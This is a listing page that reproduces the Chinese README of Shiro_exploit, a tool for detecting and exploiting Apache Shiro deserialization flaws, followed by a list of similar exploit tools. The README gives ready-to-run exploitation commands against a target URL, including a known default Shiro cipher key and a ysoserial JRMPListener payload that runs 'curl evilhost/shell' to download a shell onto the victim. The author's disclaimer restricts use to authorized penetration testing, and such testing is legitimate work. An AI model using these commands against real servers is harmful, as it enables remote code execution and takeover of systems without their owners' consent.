insightglacier / Shiro_exploit
Apache Shiro 反序列化漏洞检测与利用工具
Stars: ✭ 252
Programming Languages
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Shiro exploit
Iblessing
iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining.
Stars: ✭ 326 (+29.37%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
browserrecon-php
Advanced Web Browser Fingerprinting
Stars: ✭ 29 (-88.49%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
Vbscan
OWASP VBScan is a Black Box vBulletin Vulnerability Scanner
Stars: ✭ 295 (+17.06%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
Hack Tools
hack tools
Stars: ✭ 488 (+93.65%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
SQL Injection Payload
SQL Injection Payload List
Stars: ✭ 62 (-75.4%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
H4cker
This repository is primarily maintained by Omar Santos and includes thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more.
Stars: ✭ 10,451 (+4047.22%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
V3n0m Scanner
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Stars: ✭ 847 (+236.11%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
Vulscan
Advanced vulnerability scanning with Nmap NSE
Stars: ✭ 2,305 (+814.68%)
Mutual labels: exploit, vulnerability, vulnerability-scanners
vulnerablecode
A free and open vulnerabilities database and the packages they impact. And the tools to aggregate and correlate these vulnerabilities. Sponsored by NLnet https://nlnet.nl/project/vulnerabilitydatabase/ for https://www.aboutcode.org/ Chat at https://gitter.im/aboutcode-org/vulnerablecode Docs at https://vulnerablecode.readthedocs.org/
Stars: ✭ 269 (+6.75%)
Mutual labels: vulnerability, vulnerability-scanners
SpringBootExploit
项目是根据LandGrey/SpringBootVulExploit清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。
Stars: ✭ 1,060 (+320.63%)
Mutual labels: exploit, vulnerability
vulristics
Extensible framework for analyzing publicly available information about vulnerabilities
Stars: ✭ 46 (-81.75%)
Mutual labels: exploit, vulnerability
hack
Kubernetes security and vulnerability tools and utilities.
Stars: ✭ 56 (-77.78%)
Mutual labels: exploit, vulnerability
prl guest to host
Guest to host VM escape exploit for Parallels Desktop
Stars: ✭ 26 (-89.68%)
Mutual labels: exploit, vulnerability
TORhunter
Designed to scan and exploit vulnerabilities within Tor hidden services. TORhunter allows most tools to work as normal while resolving .onion
Stars: ✭ 47 (-81.35%)
Mutual labels: vulnerability, vulnerability-scanners
PwnX.py
🏴☠️ Pwn misconfigured sites running ShareX custom image uploader API through chained exploit
Stars: ✭ 30 (-88.1%)
Mutual labels: exploit, vulnerability
APSoft-Web-Scanner-v2
Powerful dork searcher and vulnerability scanner for windows platform
Stars: ✭ 96 (-61.9%)
Mutual labels: exploit, vulnerability
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (-85.32%)
Mutual labels: exploit, vulnerability
Chimay-Red-tiny
This is a minified exploit for mikrotik routers. It does not require any aditional modules to run.
Stars: ✭ 25 (-90.08%)
Mutual labels: exploit, vulnerability
Shiro_exploit
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境
Python2.7
requests
Jdk 1.8
使用说明
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]
OPTIONS:
-h, --help show this help message and exit
-u URL, --url URL Target url.
-t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
gadget
-p PARAMS, --params PARAMS
gadget params
-k KEY, --key KEY CipherKey
Example: python shiro_exploit.py -u target
检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。
利用的话,可以采用JRMP的方式。也可以根据检测出来的gadge来进行利用。
服务器:
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell –o shell'
本地:
python shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p "remote_host:1099" -k "kPH+bIxk5D2deZiIxcaaaA=="
常见问题
- 运行时出现 No module named 'Crypto'
运行如下命令:
pip uninstall crypto pycryptodome
pip install pycryptodome
python安装目录下的\Lib\site-packages,将crypto文件夹的名字改成Crypto。
如有其它问题或建议欢迎提交至issue。
工具的思路可以看我的博客文章:
https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/
注:请不要将该脚本用于非法用途,仅用于合法的,经过授权的渗透测试,公司内部安全检查与研究使用。由于使用工具带来的不良后果与本人无关。
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].